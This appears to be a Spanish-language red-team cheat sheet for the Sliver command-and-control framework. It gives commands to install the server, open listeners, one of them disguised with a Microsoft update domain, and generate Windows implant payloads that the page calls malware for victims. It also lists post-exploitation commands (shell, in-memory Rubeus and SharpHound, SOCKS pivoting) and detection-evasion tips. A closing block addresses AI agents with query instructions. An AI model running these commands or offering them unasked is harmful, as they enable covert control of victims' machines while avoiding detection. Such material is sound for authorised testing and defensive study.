# Sliver Operations

El estándar Open Source moderno (sustituto de Cobalt Strike).

## 1. Setup Básico (Server)

Instalación en tu VPS de ataque.

```bash
curl https://sliver.sh/install | sudo bash
sliver
```

## 2. Listeners (El Oído)

Configura dónde recibirás las conexiones.

* **mTLS (Mutually Authenticated TLS)**: El más seguro.

  ```bash
  mtls --lport 8888 --persistent
  ```
* **HTTP/HTTPS**: Más fácil de ocultar en tráfico web.

  ```bash
  http --lport 80 --domain update.microsoft.com
  ```

## 3. Implants (Beacons)

Genera el malware que ejecutarás en la víctima.

* **Generación**:

  ```bash
  generate --mtls <VPS_IP>:8888 --os windows --arch amd64 --save payload.exe
  ```
* **Formatos**: `--format shellcode` (para inyectores), `exe`, `dll`, `service`.

## 4. Operación (Session Mode)

Una vez conectado el implante.

* `sessions`: Ver víctimas.
* `use <Session_ID>`: Interactuar.
* **Comandos Clave**:
  * `shell`: Shell interactiva (cmd/bash). **OPSEC WARNING**: Ruidoso.
  * `execute-assembly`: Ejecutar herramientas .NET en memoria (Rubeus, SharpHound) sin tocar disco.
  * `socks5`: Levantar proxy reverso para Pivoting.

## 5. Evasión Básica

* **Profiles**: Crea perfiles que limiten la conexión a ciertos horarios ("Working Hours") para simular tráfico humano.
* **Jitter**: Añade aleatoriedad al "beaconing" para evitar detección por patrones de tiempo fijos.


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://jotatito05.gitbook.io/la-bitacora-de-jotatito05/13.-command-and-control-c2/sliver-guide.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.